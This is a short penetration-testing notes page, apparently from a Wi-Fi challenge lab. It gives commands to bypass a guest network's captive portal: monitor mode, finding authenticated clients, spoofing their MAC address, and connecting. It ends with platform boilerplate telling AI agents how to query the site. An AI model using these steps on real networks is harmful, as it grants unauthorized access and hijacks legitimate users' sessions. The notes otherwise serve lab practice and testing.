> For the complete documentation index, see [llms.txt](https://notes.incendium.rocks/pentesting-notes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://notes.incendium.rocks/pentesting-notes/wireless-networks/capative-portal-bypass.md).

# Capative portal bypass

## 1. Discover

```bash
# Setup monitor mode
sudo airmon-ng check kill
sudo airmon-ng start wlan0

# Scan networks & AP's
sudo airodump-ng wlan0mon
```

Pick target and check for capative portal:

<figure><img src="/files/tOax9enEATDkmQSX2l9g" alt=""><figcaption></figcaption></figure>

## 2. Find authenticated clients

```bash
sudo airodump-ng wlan0mon --band abg --bssid F0:9F:C2:71:22:10 -c 6
```

## 3. Change our own mac to authenticated mac

```bash
ip link set wlan2 down
macchanger -m b0:72:bf:44:b0:49 wlan2
ip link set wlan2 up
```

## 4. Connect to network

Once we know your ESSID we can connect to the network, for that we create a “free.conf’ file to connect from bash using “wpa\_supplicant”.

```bash
root@WiFiChallengeLab:~# cat free.conf 
network={
	ssid="wifi-guest"
	key_mgmt=NONE
	scan_ssid=1
}
```

Start network

```bash
wpa_supplicant -Dnl80211 -iwlan2 -c free.conf
```

In another terminal as root (get IP):

```bash
dhclient wlan2 -v
```

Successfully bypassed!


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://notes.incendium.rocks/pentesting-notes/wireless-networks/capative-portal-bypass.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.